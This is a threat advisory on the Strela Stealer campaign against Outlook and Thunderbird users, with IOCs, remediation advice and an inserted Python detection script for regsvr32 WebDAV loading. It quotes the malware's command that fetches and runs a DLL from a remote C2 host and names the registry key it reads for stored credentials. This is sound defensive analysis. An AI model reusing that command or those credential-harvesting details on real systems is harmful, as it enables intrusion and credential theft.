Rewterz

Strela Stealer Malware Targets Microsoft Outlook Users for Credential Theft – Active IOCs

Severity

High

Analysis Summary

Cybersecurity researchers have uncovered a sophisticated malware campaign targeting Microsoft Outlook users to steal login credentials. Dubbed Strela Stealer (named after the Russian word for "arrow"), the malware has been active since late 2022, primarily affecting users in Spain, Italy, Germany, Poland, and Ukraine. It specifically exfiltrates email credentials from both Microsoft Outlook and Mozilla Thunderbird clients.

The malware is distributed through targeted phishing emails designed to appear legitimate. Attackers hijack existing email conversations, particularly invoice-related threads, and replace original attachments with malicious ZIP archives. These ZIP files contain a JScript loader, which initiates the infection chain once executed. The phishing emails are written in the native language of the target country, increasing their credibility.

Strela Stealer employs multi-stage infection and obfuscation techniques to evade detection. The initial infection starts with a heavily obfuscated JScript file, which verifies the target system’s geographic location by checking the system’s locale identifier (LCID) in the Windows registry (Control Panel\International\Locale). Once confirmed as a target, the script downloads additional payloads from a command-and-control (C2) server using the WebDAV protocol. The malware loads its second stage directly into memory via the command:

"cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL"

Because the second-stage DLL is fetched from a remote WebDAV share and loaded by the signed system binary regsvr32 rather than being written to disk first, this fileless execution method evades traditional antivirus solutions that rely on scanning files on disk.
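The infection chain above (JScript loader, then regsvr32 pulling a DLL over WebDAV) leaves a distinctive footprint in process-creation telemetry. The following is an added detection example, not code from the advisory or the vendor: it evaluates a few constructed, Sysmon-style process events (hypothetical field names image/parent/cmdline) and flags the WebDAV mini-redirector UNC syntax (\\host@port\davwwwroot\...) and script-host-driven regsvr32 launches.

```python
import re

# Constructed sample process-creation events (simplified Sysmon EID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\1909835116765.dLL"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Rar$\Invoice_2931.js"'},
]

# WebDAV mini-redirector UNC syntax: \\host@port\... (optionally \\host@ssl@port\...) or a davwwwroot share.
WEBDAV_UNC = re.compile(r"\\\\[\w.\-\[\]]+@(ssl@)?\d+\\|davwwwroot", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXT = re.compile(r"\.(js|jse|wsf)\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of detection reasons for one process-creation event (empty if clean)."""
    reasons = []
    image, parent, cmdline = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    if "regsvr32" in cmdline.lower():
        if WEBDAV_UNC.search(cmdline):
            reasons.append("regsvr32 loading a DLL over WebDAV (remote, fileless second stage)")
        elif "\\\\" in cmdline:
            reasons.append("regsvr32 loading a DLL from a UNC path")
        if parent in SCRIPT_HOSTS:
            reasons.append("regsvr32 launched from a script host (JScript loader chain)")
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmdline):
        reasons.append("script host executing a .js/.jse/.wsf file (possible mail-borne loader)")
    return reasons


def scan(events):
    """Map the index of each flagged event to its reasons; clean events are omitted."""
    return {i: r for i, e in enumerate(events) if (r := evaluate(e))}


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

The legitimate installer in the second event registers a local DLL and is not flagged, which is the false-positive case a rule keyed only on regsvr32 would trip over.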

The final payload focuses on stealing Microsoft Outlook credentials. It scans the Windows registry for Outlook profile data, particularly targeting the key:

"HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"

where email configurations are stored. The malware extracts IMAP usernames, servers, and passwords, decrypting the stored credentials with the CryptUnprotectData API. Before exfiltrating stolen data, it employs bit-checking routines to ensure activation only on targeted systems. The stolen credentials and system information are then transmitted via HTTP POST requests to an attacker-controlled server.

Strela Stealer highlights the growing sophistication of targeted phishing attacks and fileless malware techniques. Organizations must strengthen email security, implement geo-based filtering, disable macros in email attachments, and monitor WebDAV traffic to detect abnormal connections. Additionally, using multi-factor authentication (MFA) and endpoint detection solutions can significantly reduce the risk of credential theft.

Impact

  • Credential Theft
  • Data Theft
  • Command Execution

Indicators of Compromise

IP

  • 193.143.1.205

URL

  • http://193.143.1.205/invoice.php
  • http://193.143.1.205/up.php

Remediation

  • Implement geo-based email filtering to block phishing emails targeting specific regions.
  • Train employees to recognize phishing attempts, especially invoice-related email scams.
  • Enforce multi-factor authentication (MFA) to prevent unauthorized email access.
  • Regularly update endpoint detection and response (EDR) solutions to detect fileless malware.
  • Disable macros and script execution for untrusted email attachments.
  • Monitor WebDAV traffic for unusual outbound connections to potential command-and-control servers.
  • Restrict execution of JScript and other scripting languages in corporate environments.
  • Conduct regular security audits to identify and patch vulnerabilities in email clients.
  • Use application whitelisting to prevent unauthorized script execution.
  • Deploy email security gateways to scan and filter malicious attachments before delivery.